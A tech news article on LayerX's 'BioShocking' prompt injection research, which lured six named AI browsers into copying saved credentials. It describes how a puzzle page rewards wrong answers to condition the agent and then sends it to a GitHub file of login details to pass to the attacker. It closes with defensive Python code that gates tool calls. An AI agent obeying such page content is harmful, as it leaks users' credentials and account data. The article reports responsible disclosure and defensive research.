Security researchers trick AI browsers into revealing passwords using BioShock-inspired prompt injection

Named after BioShock's 'Would you kindly' mechanic, the attack trains AI agents to accept false information before stealing saved credentials.

TL;DR: Security researchers at LayerX revealed a BioShock-inspired prompt injection attack that tricks AI browsers into revealing saved passwords by training them to accept false information. Of the six AI browsers tested, only OpenAI's has been fully fixed. LayerX advises prompting the user before an agent accesses signed-in accounts, to prevent credential theft.
Hassam Nasir, Tech Reporter

Security researchers at LayerX have discovered a new prompt injection technique that tricks AI browsers into revealing saved passwords and login credentials by leading them to believe they are playing a game.

The attack is called BioShocking, named after the 2007 video game BioShock. The game's protagonist has been conditioned to obey any command prefaced with the phrase "Would you kindly?" The attack works the same way: the AI agent accepts whatever information it is given, so changing that information changes what it will do.

The attack starts on a malicious webpage designed as a puzzle called Rapture Games, themed after BioShock's underwater world. The puzzle rewards wrong answers, training the agent to accept that 2+2=5 and that incorrect actions are the winning move. Once the agent learns this, its safety protections stop working. The last step of the puzzle tells the agent to navigate to a GitHub repository and copy the login details stored there.


ChatGPT Atlas, Perplexity's Comet, Fellou, Genspark Browser, Sigma Browser, and Anthropic's Claude Chrome extension all copied real credentials and passed them to the attacker. LayerX used a controlled test environment with a plaintext file, but the same technique could point an agent at any resource it can reach in that session, including open tabs, signed-in accounts, and internal company tools.

LayerX notified all six vendors between October 2025 and January 2026. OpenAI is the only vendor to have implemented a working fix in ChatGPT Atlas. Anthropic attempted a patch for its Claude extension, but LayerX says it did not hold. Perplexity closed the report without acting on it, while Fellou, Genspark, and Sigma did not respond.


Frequently Asked Questions

How did LayerX validate that credentials were exfiltrated during their controlled tests?

They used a controlled test environment where the AI agents were directed to a plaintext file containing login details on a GitHub repository. During those tests ChatGPT Atlas, Perplexity's Comet, Fellou, Genspark Browser, Sigma Browser, and Anthropic's Claude Chrome extension all copied the real credentials from that plaintext file and passed them to the attacker.

LayerX recommends that AI browsers prompt users before reading from signed-in accounts. Something as simple as "I am about to copy data from your GitHub repository, continue?" would break the chain entirely. Until that becomes standard, agent mode is effectively another account with reach into everything you are signed in to.
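The confirmation step LayerX recommends can be enforced as a policy gate in front of the agent's tool calls. The following is an added illustration, not code from LayerX or from any of the browsers named above: every tool call carries an origin (the user's own task, or an instruction found in web content), reads from a signed-in host always pause for user confirmation, and data that was read from a signed-in host may not be sent to a different host on a page's say-so. The hostnames in the constructed chain are placeholders.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable
from urllib.parse import urlparse


class Decision(Enum):
    ALLOW = "allow"
    CONFIRM = "confirm"  # pause and ask the user before proceeding
    DENY = "deny"


@dataclass
class Session:
    """What the browser knows about the user's current state."""
    signed_in_hosts: set                           # hosts with a live login session
    read_hosts: set = field(default_factory=set)  # signed-in hosts read from during this task


@dataclass
class ToolCall:
    tool: str    # "navigate" | "read" | "send"
    target: str  # URL the call touches
    origin: str  # "user": part of the user's own task; "page": instruction found in web content


def host_of(url: str) -> str:
    return urlparse(url).hostname or ""


def evaluate(call: ToolCall, session: Session) -> Decision:
    host = host_of(call.target)
    if call.tool == "read" and host in session.signed_in_hosts:
        # Reading from a signed-in account always needs the user's explicit OK,
        # no matter who asked for it.
        return Decision.CONFIRM
    if call.tool == "send" and session.read_hosts and host not in session.read_hosts:
        # Data from a signed-in account is about to leave for a different host.
        # Web content may never trigger that; the user may, but only after confirming.
        return Decision.DENY if call.origin == "page" else Decision.CONFIRM
    return Decision.ALLOW


def describe(call: ToolCall) -> str:
    return f"I am about to {call.tool} {call.target} (requested by {call.origin}), continue?"


def run_task(calls, session: Session, confirm: Callable[[str], bool]):
    """Execute tool calls in order and stop at the first denied step.

    Returns a list of (call, final decision) pairs."""
    trace = []
    for call in calls:
        decision = evaluate(call, session)
        if decision is Decision.CONFIRM:
            decision = Decision.ALLOW if confirm(describe(call)) else Decision.DENY
        trace.append((call, decision))
        if decision is Decision.DENY:
            break
        if call.tool == "read" and host_of(call.target) in session.signed_in_hosts:
            session.read_hosts.add(host_of(call.target))
    return trace


# Constructed chain mirroring the article's description: the user opens a page,
# whose content then instructs the agent to fetch a repository file and send it
# elsewhere. Hostnames are placeholders, not values from the LayerX report.
CHAIN = [
    ToolCall("navigate", "https://puzzle.example/", "user"),
    ToolCall("navigate", "https://github.com/example-user/example-repo", "page"),
    ToolCall("read", "https://github.com/example-user/example-repo/creds.txt", "page"),
    ToolCall("send", "https://collector.example/submit", "page"),
]


def demo(user_approves: bool):
    """Run the chain with a user who always answers the same way to the prompt."""
    session = Session(signed_in_hosts={"github.com"})
    return [d.value for _, d in run_task(CHAIN, session, lambda msg: user_approves)]


if __name__ == "__main__":
    print(demo(False))  # user declines the read prompt: chain stops at step 3
    print(demo(True))   # user approves the read, but the page-driven send is still denied
```

Two independent controls are at work: the confirmation prompt breaks the chain whenever the user declines, and the origin check catches the case where the user approves the read without realising the page, not their task, asked for it.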


News Source:layerxsecurity.com

Tech Reporter


Hassam is a veteran tech journalist and editor with over eight years of experience embedded in the consumer electronics industry. His obsession with hardware began with childhood experiments involving semiconductors, a curiosity that evolved into a career dedicated to deconstructing the complex silicon that powers our world. From benchmarking PC internals to stress-testing flagship CPUs and GPUs, Hassam specializes in translating high-level engineering into deep, unbiased insights for the enthusiast community.
